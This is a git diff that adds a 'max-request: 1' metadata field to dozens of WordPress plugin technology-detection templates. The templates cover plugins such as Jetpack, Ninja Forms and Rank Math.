   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
+    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
